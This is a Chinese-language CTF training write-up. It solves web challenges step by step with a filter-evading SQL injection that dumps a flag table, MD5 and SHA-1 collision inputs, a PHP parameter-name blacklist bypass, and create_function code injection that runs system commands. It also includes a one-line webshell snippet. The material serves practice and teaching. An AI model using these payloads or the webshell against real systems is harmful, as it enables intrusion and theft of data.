CTF集训
[SWPUCTF 2021 新生赛]sql
告诉了参数是wllm
?wllm=1' and 1=1#
有过滤,手测了一下,发现过滤了注释符,空格
# --> %23
--> /**/
?wllm=-1'/**/order/**/by/**/3%23
?wllm=-1'/**/order/**/by/**/4%23
order by 4报错,说明列数是3
?wllm=-1'/**/union/**/select/**/1,2,database()%23
爆出库名test_db
?wllm=-1'/**/union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'test_db'%23
爆表,这里 = 被过滤了,用 like 来替换
?wllm=-1'/**/union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'LTLT_flag'%23
爆列
?wllm=-1'/**/union/**/select/**/1,2,group_concat(id,flag)/**/from/**/LTLT_flag%23
?wllm=-1'/**/union/**/select/**/1,2,substring(group_concat(id,flag),0,10)/**/from/**/LTLT_flag%23
一开始想到用substring,但是不行,应该是被过滤了
?wllm=-1'/**/union/**/select/**/1,2,mid(group_concat(id,flag),1,30)/**/from/**/LTLT_flag%23
?wllm=-1'/**/union/**/select/**/1,2,mid(group_concat(id,flag),20,30)/**/from/**/LTLT_flag%23
?wllm=-1'/**/union/**/select/**/1,2,mid(group_concat(id,flag),30,50)/**/from/**/LTLT_flag%23
拼起来就ok
NSSCTF{5059b7c3-906a-4f11-bca3-23311d9611cb}
[NISACTF 2022]level-up
没有东西,查看源代码
发现 disallow: ,这就是 robots.txt 的内容格式,去访问一下
进入level_2_1s_h3re.php
<?php
//here is level 2
// Reads two POST strings; prints $level3 only when they differ but hash to the
// same MD5 digest.
error_reporting(0);
// $level3 is presumably defined by str.php — not visible here.
include "str.php";
if (isset($_POST['array1']) && isset($_POST['array2'])){
$a1 = (string)$_POST['array1'];
$a2 = (string)$_POST['array2'];
// Loose == rejects byte-identical inputs (and numeric-looking strings such as
// "1" and "1.0"), so the check below can only be passed by two distinct
// strings sharing an MD5 digest.
if ($a1 == $a2){
die("????");
}
// MD5 is not collision-resistant, so equal digests do not prove equal inputs.
// A robust check compares the values themselves, or uses a collision-resistant
// hash (e.g. SHA-256) with hash_equals() for the comparison.
if (md5($a1) === md5($a2)){
echo $level3;
}
else{
die("level 2 failed ...");
}
}
else{
// No input: show this file so the rule is visible.
show_source(__FILE__);
}
?>
强碰撞
array1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
&array2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
进入Level___3.php
<?php
//here is level 3
// Same shape as level 2, with SHA-1 in place of MD5: two distinct POST strings
// with an identical SHA-1 digest reveal $level4.
error_reporting(0);
// $level4 is presumably defined by str.php — not visible here.
include "str.php";
if (isset($_POST['array1']) && isset($_POST['array2'])){
$a1 = (string)$_POST['array1'];
$a2 = (string)$_POST['array2'];
// Loose == rejects identical inputs, so only a digest collision passes below.
if ($a1 == $a2){
die("????");
}
// SHA-1 is likewise no longer collision-resistant; a digest match is not a
// proof of input equality. Compare the values directly, or use SHA-256 (or
// stronger) together with hash_equals().
if (sha1($a1) === sha1($a2)){
echo $level4;
}
else{
die("level 3 failed ...");
}
}
else{
show_source(__FILE__);
}
?>
sha强碰撞
array1=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1
&array2=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1
进入level_level_4.php
<?php
//here is last level
// Expects $_GET['NI_SA_'] === "txw4ever" while forbidding space, underscore,
// dot and the sequences 20/5f/2e anywhere in the raw query string.
error_reporting(0);
// $level5 is presumably defined by str.php — not visible here.
include "str.php";
show_source(__FILE__);
// The denylist is applied to the raw query string from REQUEST_URI, not to the
// decoded parameter names PHP actually places in $_GET.
$str = parse_url($_SERVER['REQUEST_URI']);
// With no query component $str['query'] is unset (null), and null == "" holds.
if($str['query'] == ""){
echo "give me a parameter";
}
// Raw-string denylist: PHP normalises certain characters in parameter names
// when building $_GET, so the filtered text and the parsed key can disagree.
// Validating the decoded key/value against an allowlist is the robust control.
if(preg_match('/ |_|20|5f|2e|\./',$str['query'])){
die("blacklist here");
}
if($_GET['NI_SA_'] === "txw4ever"){
die($level5);
}
else{
die("level 4 failed ...");
}
?>
give me a parameterlevel 4 failed ...
知识点是 PHP 的查询字符串解析特性:参数名中的非法字符会被转换为 _ ,这里将 _ 用 + 替换
?NI+SA+=txw4ever
<?php
//sorry , here is true last level
//^_^
// Calls a user-supplied function name with a user-supplied second argument.
error_reporting(0);
include "str.php";
$a = $_GET['a'];
$b = $_GET['b'];
// Only the callee name is checked: a name made solely of [a-z0-9_] shows the
// source, anything else reaches the call. $b is never validated.
if(preg_match('/^[a-z0-9_]*$/isD',$a)){
show_source(__FILE__);
}
else{
// Variable-function call on raw request data is an arbitrary-code-execution
// sink. Dispatch through a fixed allowlist of permitted callables instead of
// a regex denylist on the name.
$a('',$b);
}
\create_function('',}system('tac /flag');//);
这之后就要用create function注入
因为$a正则所以开头加个\绕过
}为了闭合前面 //注释掉后面得出flag
?a=\create_function&b=}system('tac /flag');//
create_function注入
create_function 函数
#创建匿名函数执行代码
#执行命令和上传文件参考eval函数(必须加分号)。
#菜刀连接密码:cmd
$func =create_function('',$_POST['cmd']);$func();
create_function函数
适用范围:PHP 4 >= 4.0.1, PHP 5, PHP 7(PHP 7.2 起已弃用, PHP 8.0 中已移除)
功能:根据传递的参数创建匿名函数,并为其返回唯一名称。
create_function(string $args,string $code)
string $args 声明的函数变量部分
string $code 执行的方法代码部分
案例:
<?php
// create_function() demo: the second argument is compiled as PHP source at
// run time (equivalent to eval), so any untrusted text reaching it is code
// injection. The function was deprecated in PHP 7.2 and removed in PHP 8.0.
$newfunc = create_function('$a, $b', 'return "$a + $b = " . ($a + $b);');
// The return value is the generated function's name (a string), not a closure.
echo "function: " . $newfunc . "\n";
echo $newfunc(3,4);
可以看到,create_function 的第一个参数是匿名函数的参数名,第二个参数是函数里面的逻辑代码
如何利用create_function 进行代码注入
<?php
// Vulnerable demo: $id comes straight from the query string and is spliced
// into PHP source text that create_function() then compiles.
$id=$_GET['id'];
// NOTE(review): $a is undefined in this scope and interpolates as an empty
// string; it presumably was meant as the anonymous function's own $a
// parameter — confirm.
$str2='echo '.$a.'test'.$id.";";
echo $str2;
echo "<br/>";
echo "==============================";
echo "<br/>";
// Code-injection sink: request data becomes part of the function body rather
// than being passed as a value. Build a real closure and pass $id as an
// argument instead of generating source from input.
$f1 = create_function('$a',$str2);
echo "<br/>";
echo "==============================";
在这个例子中,$str2 被带入 create_function 中执行,那我们就需要闭合这个函数,然后注释掉接下来的语句,就可以形成我们的 payload
http://fx.com/create2.php?id=;};phpinfo();//
上面匿名函数可能大家都看不明白,我把常用的函数声明的方式写出来
<?php
//conventional form
// Hand-written equivalent of the generated function. Here $_GET['id'] is
// concatenated at run time as data; in the create_function() version the same
// text becomes part of the function's source, which is what makes injection
// possible there.
function func($a){
echo $a . 'test' . $_GET['id'] . ';';
}
//create2.php?id=;};phpinfo();// 注入后的代码
function func($a){
echo $a . 'test';}
phpinfo();//' . ';' //形成代码注入
}
code-breaking2018 中的一道题
<?php
// Dispatches a user-chosen function name with a user-chosen second argument.
$action = $_GET['action'] ?? '';
$arg = $_GET['arg'] ?? '';
// A name consisting only of [a-z0-9_] shows the source; any other name reaches
// the call below. $arg is never validated.
if(preg_match('/^[a-z0-9_]*$/isD', $action)) {
show_source(__FILE__);
} else {
// Variable-function call on request data is a remote-code-execution sink.
// A fixed allowlist of callables (e.g. via match) is the correct control;
// a regex denylist on the name is not.
$action('', $arg);
}
这题十分简短精悍,特别看到 $action('', $arg); 就条件反射肯定是 create_function,应该是需要找到一个在 [a-z0-9_] 之外的字符放置在函数名前而不影响函数的调用。简单传入:
http://127.0.0.1:8087/?action=%20system&arg=
让页面报错了,fuzz 之后得到 \ 。\ 在 PHP 中表示全局(根)命名空间,所以整个代码就是 \create_function('', $arg); ,是可以运行的;arg 就用我们上面说到的方法。最后的 payload 就是 http://127.0.0.1/?action=\create_function&arg=}phpinfo();//